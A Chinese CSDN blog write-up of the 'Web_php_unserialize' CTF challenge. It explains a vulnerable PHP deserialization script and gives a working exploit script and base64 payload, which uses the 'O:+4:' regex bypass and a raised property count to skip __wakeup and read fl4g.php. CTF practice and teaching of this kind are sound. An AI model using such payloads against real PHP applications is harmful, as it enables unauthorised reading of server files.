Web_php_unserialize-攻防世界

最新推荐文章于 2024-06-02 11:24:45 发布
最新推荐文章于 2024-06-02 11:24:45 发布
阅读量1k 收藏 29
点赞数 8
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/szhangliwenya/article/details/136941815
版权
文章详细分析了一个PHP类Demo,涉及构造函数、析构函数和__wakeup魔术方法,展示了如何通过序列化和正则表达式检测潜在的安全威胁,以及如何通过修改序列化字符串来绕过安全检查。
摘要由CSDN通过智能技术生成

题目

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

 源码分析

<?php   
class Demo {

定义了一个名为Demo的类。

private $file = 'index.php';

Demo类中,定义了一个私有成员变量$file,并初始化为'index.php'

public function __construct($file) {   
        $this->file = $file;   
    }

 这是Demo类的构造函数,它接受一个参数$file,并将其值赋给$this->file

function __destruct() {   
        echo @highlight_file($this->file, true);   
    }

这是Demo类的析构函数,当对象被销毁时调用。它使用highlight_file函数高亮显示$this->file指定的文件内容,并输出到浏览器。@符号表示忽略错误,即如果highlight_file函数出错,不会显示错误信息。

function __wakeup() {   
        if ($this->file != 'index.php') {   
            //the secret is in the fl4g.php  
            $this->file = 'index.php';   
        }   
    }

 这是Demo类的__wakeup方法,它在对象被反序列化时调用。它检查$this->file是否不等于'index.php',如果不等于,则将其重新设置为'index.php'。注释中提到“秘密在fl4g.php”,但此代码并未直接引用或显示fl4g.php

if (isset($_GET['var'])) {

 检查GET参数var是否存在。

$var = base64_decode($_GET['var']);

如果var存在,将其值进行base64解码,并赋值给$var

if (preg_match('/[oc]:\d+:/i', $var)) {   
        die('stop hacking!');   
    } else {

使用正则表达式检查$var是否包含对象或类的序列化字符串。如果包含,则终止脚本并输出“stop hacking!”。

@unserialize($var);   
    }   
} else {   
    highlight_file("index.php");   
}

 如果$var不包含对象或类的序列化字符串,则尝试对其进行反序列化。如果GET参数var不存在,则直接高亮显示index.php文件。

playload构造:

先创建对象序列化

<?php
class Demo {
private $file = 'index.php';
//protected $file1 = 'index.php';
public function __construct($file) {
    $this->file = $file;
    //$this->file1 = $file1;
}
function __destruct() {
    echo @highlight_file($this->file, true);
}
function __wakeup() {
    if ($this->file != 'index.php') {
        //the secret is in the fl4g.php
        $this->file = 'index.php';
    }
}
}

$a=new Demo("fl4g.php");
$b=serialize($a);
echo($b);
?>

得到序列化后的字符串

O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}

 由于有preg_match函数和_wakeup()魔术方法过滤

'/[oc]:\d+:/i’

匹配o或c任意一个,冒号,至少一个数字,冒号,不区分大小写
[ ] 是定义匹配的字符范围
[oc]是匹配o或c任意一个
[xyz] 字符集合。匹配所包含的任意一个字符。例如, ‘[abc]’ 可以匹配 “plain” 中的 ‘a’

当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}

 

这个字符串 O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";} 是一个序列化的PHP对象字符串。它表示一个Demo类的实例,其中包含了对象的属性和值。下面我将解释这个字符串中的每个部分:

  1. O: 表示这是一个对象。
  2. 4: 表示类名Demo的长度是4个字符。
  3. "Demo": 这是对象的类名。
  4. 1: 表示对象有一个属性。
  5. {...}: 对象属性的集合用大括号括起来。
  6. s:10:"Demofile":
    • s: 表示这是一个字符串类型的属性。
    • 10: 表示属性名Demofile的长度是10个字符。
    • "Demofile": 这是属性的名称。但请注意,这个属性名在原始的Demo类定义中并不存在。原始类定义中属性名是$file,这里似乎是一个错误或者篡改。
  7. s:8:"fl4g.php":
    • s: 表示这也是一个字符串类型的属性。
    • 8: 表示属性值fl4g.php的长度是8个字符。
    • "fl4g.php": 这是属性的值。这似乎是代码中的一个提示,表示真正的“秘密”或重要信息在fl4g.php这个文件中。

  1. '/[oc]:\d+:/i': 这是传递给 preg_match 函数的正则表达式字符串。

    • /.../i: 正则表达式的定界符和修饰符。这里的 i 表示不区分大小写(case-insensitive)的匹配。

    • [oc]: 字符类,匹配单个字符,这个字符可以是 o 或 c。在 PHP 对象和类的序列化字符串中,o 通常表示对象(object),c 表示类(class)。

    • :: 匹配冒号字符 :。在 PHP 的序列化字符串中,对象或类后面通常会紧跟一个冒号。

    • \d+\d 是一个特殊字符,表示任意数字(0-9)。+ 表示前面的元素(即 \d)可以出现一次或多次。因此,\d+ 匹配一个或多个连续的数字。

    • :: 再次匹配冒号字符 :。在序列化字符串中,这通常用于分隔对象或类的名称与后面的属性数据。

 

构造新的playload

将O:4:改为O:+4:绕过匹配,将字符串中的属性1改为大于它的正整数 绕过_wakeup。还要绕过

base64_decode将替换后的字符串base64_encode

<?php
class Demo {
private $file = 'index.php';
//protected $file1 = 'index.php';
public function __construct($file) {
    $this->file = $file;
    //$this->file1 = $file1;
}
function __destruct() {
    echo @highlight_file($this->file, true);
}
function __wakeup() {
    if ($this->file != 'index.php') {
        //the secret is in the fl4g.php
        $this->file = 'index.php';
    }
}
}

$a=new Demo("fl4g.php");
$b=serialize($a);
$b=str_replace('O:4:','O:+4:',$b);
$b=str_replace(':1:',':2:',$b);
$b=base64_encode($b);
echo($b);

?>

 最好直接替换,不要自己去替换Demo前后有空格自己看不出来,$file 是私有成员序列化之后字符串首尾会多出两个空格 “%00*%00”,所以base64加密最好在代码中执行防止复制漏掉。

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

 

20_aw
关注
  • 8
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web Web_php_unserialize
汗的博客
08-24 607
攻防世界 web 高手区 Web_php_unserialize 资源&工具 PHP 手册 W3School的PHP 参考手册 write up 源码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { e
php_redis-2.2.7-5.6-ts-vc11-x64和php_igbinary-2.0.1-5.6-ts-vc11-x64
08-08
在IT行业中,PHP是一种广泛使用的服务器端脚本语言,尤其在Web开发领域有着重要的地位。在给定的标题和描述中,我们关注的是两个PHP扩展:php_redis和php_igbinary,它们是针对PHP 5.6版本的。这两个扩展分别用于...
攻防世界Web_php_unserialize
m0_74979597的博客
09-21 297
这里为什么过滤的是:‘o:数字’和‘c:数字’呢而且不区分大小写;因为serialize() 的参数为 object , 参数类型有对象 " O " , 序列化字符串的格式为 参数格式:参数名长度 , " O:4 " 字符串会被过滤;对象的属性个数有关,如果序列化后的字符串中表示属性个数的数字与真实属性个数一致,那么i就调用__wakeup()函数 ,不一致就ok了;str_replace('O:4', 'O:+4',$C) 代替函数,冲字符串y中寻找'O:4',并替换;从题目:知道反序列化;
攻防世界---web---Web_php_unserialize
最新发布
2201_75556700的博客
06-02 1215
表示的是一个对象,后面的数字4表示类名的长度。通过将4替换为+4,可以使正则表达式无法匹配,从而绕过检查。:最后,将修改后的序列化字符串进行Base64编码,然后输出。类的实例,并对其进行序列化,然后将序列化后的字符串赋值给变量。这样的正则表达式检查。原始的序列化字符串中,6、在源代码中我们需要绕过几个函数。7、运行代码可以看到序列后的结果。4、根据代码中的提示,我们将。的类,该类有一个私有属性。通过将序列化字符串中的。:这行代码的目的是绕过。:这行代码的目的是绕过。
攻防世界——Web——Web_php_unserialize
慎铭的博客
02-22 724
题目源代码如下。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup
攻防世界Web_php_unserialize
姜小孩的博客
04-14 2961
反序列化 绕过__wakeup魔术方法 __wakeup魔术方法 Web_php_unserialize 攻防世界
php中magic_quotes_gpc对unserialize的影响分析
10-25
主要介绍了php中magic_quotes_gpc对unserialize的影响,以实例的形式分析了magic_quotes_gpc安全过滤对unserialize造成的影响以及对此的解决方法,非常具有实用价值,需要的朋友可以参考下
php_igbinary.dll 5.5-x86 php_redis.dll 5.5-5.6 X86 64
04-05
相比于传统的PHP序列化(serialize)和反序列化(unserialize),igbinary可以显著减少内存使用和提高处理速度。这是因为igbinary序列化的数据结构紧凑,减少了CPU和内存的负担。在Web应用程序中,特别是那些需要...
php_igbinary-1.2.1-5.4-ts-vc9-x86
04-01
3. 重启Web服务器以使配置生效。 4. 可以通过`phpinfo()`函数查看igbinary是否成功加载。 **四、使用igbinary** 在PHP代码中,igbinary提供了两个主要的函数:`igbinary_serialize()`和`igbinary_unserialize()`,...
php_igbinary-1.1.1-5.6
12-26
`igbinary`扩展的核心功能在于替换传统的PHP序列化(serialize)和反序列化(unserialize)机制。传统的序列化方式会将PHP变量转化为ASCII字符串,这在处理大量数据时不仅占用更多存储空间,而且在读取和解析过程中...
攻防世界-web-Web_php_unserialize
wuh2333的博客
06-02 697
2.1 __wakeup函数:若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行。根据以上分析,我们将Demo后门的1改为2即可绕过__wakeup函数,O:4改为O:+4即可绕过正则,再进行base64编码即可(这里注意一定要再代码中处理,线上以及一些工具上进行base64和php代码中进行base64获取到的结果不一样)
攻防世界-Web_php_unserialize
m0_62094846的博客
01-11 730
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() ...
攻防世界 Web_php_unserialize
Jay17的博客
02-24 206
攻防世界 Web_php_unserialize
攻防世界——Web_php_unserialize
weixin_73942557的博客
10-30 182
访问网页以后首先显示这段源码,分析一下代码结构,包含一个类。里面包含了 三个魔术方法:__construct\__destruct\__wakeup 后面的判断中包含了isset魔术方法 ,base64_decode解密,正则表达式判断。 那么现在来思考如何绕过 1、@unserialize($var); @符号抑制了错误输出,所以无法通过这里进行信息获取 2、当调用这个脚本时会触发__wakeup魔术方法,需要对它进行绕过 那么我们通过改变让这个参数大于后面的index.php文件 $f
攻防世界web_php_unserialize
06-28
### 回答1: 攻防世界web_php_unserialize是一个关于PHP反序列化漏洞的题目,需要掌握PHP反序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并进行一些操作,最终达到获取flag的目的。这个题目需要掌握PHP的序列化和反序列化函数,以及对序列化字符串的解析能力。 ### 回答2: web_php_unserialize指的是PHP反序列化漏洞。序列化是指将对象转换为字节流的过程,反序列化则是将字节流还原为原始对象的过程。PHP序列化对于数据的传输和存储非常方便,但是如果在执行反序列化过程中存在漏洞,就会导致恶意攻击者能够注入恶意代码,并可能导致代码执行、文件读写、远程代码执行等危险后果。攻防世界中的web_php_unserialize比赛就是通过挖掘实际漏洞并利用它们对目标进行攻击的比赛。 攻防世界中的web_php_unserialize比赛通常会考查参赛者对PHP反序列化漏洞的深入理解和实际应用能力。比赛中的攻击场景可能会包括以下几个方面: 1. 对序列化字符串的解析和理解。参赛者需要清楚地知道序列化字符串中不同数据类型的表示方法,包括字符串、数组、对象等。 2. 对序列化字符串中的数据类型和值进行篡改。恶意攻击者通常会利用序列化字符串的可篡改性注入恶意代码或者修改重要数据,参赛者需要在比赛中证明自己能够精准地修改序列化字符串中的数据类型和值。 3. 对反序列化函数的使用和理解。PHP反序列化漏洞很多都是由于对反序列化函数的不当使用导致的。参赛者需要清楚地知道反序列化函数参数的含义以及如何正确使用反序列化函数。 4. 对代码的理解和审计。比赛中可能会给出一些被漏洞的代码,参赛者需要仔细地审计代码并找出漏洞的具体原因。 总的来说,攻防世界中的web_php_unserialize比赛旨在锻炼参赛者的漏洞挖掘和漏洞利用能力,并通过挖掘实际漏洞来理解和掌握漏洞的本质和原理。 ### 回答3: 攻防世界web_php_unserialize是一种基于PHP反序列化漏洞的CTF题目。这个题目主要考察选手对于PHP反序列化漏洞的理解和应用能力。 在一般的PHP应用程序中,序列化是将一个对象或一组数据转换成一个数据流的过程,反序列化则是将这个数据流转回成对象或一组数据。反序列化漏洞是指当应用程序在反序列化过程中没有对数据流进行足够的验证和过滤,导致攻击者可以在数据流中注入恶意代码,以此来执行代码并最终造成攻击。这种漏洞在很多PHP应用程序中都存在,而攻防世界web_php_unserialize就是基于这个漏洞设计的一道CTF题目。 这个题目的主要思路是通过构造一个特定的序列化数据,并将其作为参数提交给目标站点。该序列化数据包含了一个恶意代码,在反序列化时可以执行恶意代码,从而完成攻击。选手需要先了解序列化和反序列化的原理,然后使用PHP代码构造一个带有恶意代码的序列化数据,成功利用反序列化漏洞执行代码并获取到flag。 这道题目对于选手的PHP语言理解和代码能力有一定的要求,同时也需要选手在考虑漏洞时具备一定的克制能力,对于数据的过滤和验证也需要有一定的认识。通过挑战攻防世界web_php_unserialize,选手可以深入了解PHP反序列化漏洞的原理和应用,有效提高自己的防御意识和CTF能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值